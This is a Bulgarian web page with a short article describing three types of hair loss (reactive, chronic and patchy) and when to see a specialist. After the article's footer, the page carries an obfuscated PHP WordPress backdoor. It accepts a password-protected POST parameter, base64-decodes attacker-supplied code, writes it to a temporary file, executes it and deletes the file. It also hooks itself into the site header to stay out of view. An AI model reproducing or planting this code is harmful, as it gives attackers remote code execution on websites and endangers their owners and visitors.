Видовете косопад | Косопад

Основни видове косопад

Най – често срещаните видове косопад

Засилващата се загуба на коса е тревожно явление и за мъжете, и за жените. Дамите обаче трябва да обърнат по – особено внимание, защото в повечето случаи това е сигурен признак за влошаване на здравословното състояние като цяло. Задължително трябва да посетите специалист, защото определянето на вида оплешивяване е ключов момент при вземането на адекватно решение за лечение. Ето кои са основните видове косопад и как да ги разпознаем.

Видовете косопад

Видовете косопад

Реактивен косопад

Това е най – често срещаният косопад при жените. Характерно за него е, че се появява внезапно и зад появата му винаги има конкретна причина. Симптомите са равномерна загуба на коса по целия скалп, а не олисяване само на определени участъци. Понякога е временен (свързан със смяната на сезоните, преумора, употреба на определени лекарства, моментен стрес и др.) и изчезва от самосебе си за няколко месеца. Обикновено подлежи на лечение.

Хроничен косопад

Характерен е за представителите на двата пола, с лек превес на мъжете. Олисяването на косата започва от областта на темето, процесът донякъде е незабележим, но за сметка на това постоянен. Причинява се от увреждания на космения фоликул, предизвикани от прекомерно струпване на мъжкия хормон тестостерон в засегнатите зони. Задължително трябва да отбележим, че количеството на хормона в тялото е в нормалните нива, но засегнатите зони са по – чувствителни към него. Този вид оплешивяване може да продължи с години и да не доведе до оголване на цели участъци, а само до изтъняване на косата.

Гнездови косопад

В този случай оплешивяването засяга само определени участъци по главата. При него се наблюдават изцяло голи петна, а на другите места косата не търпи промени. Лечението на този вид е косопад по принцип е най – трудно, защото се появява като следствие от нарушения в имунната или психическата системи. Правилната диагностика и адекватно лечение могат да решат проблема и косата да се възстанови.

30. март 2013 15:50:02 от Косопад
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}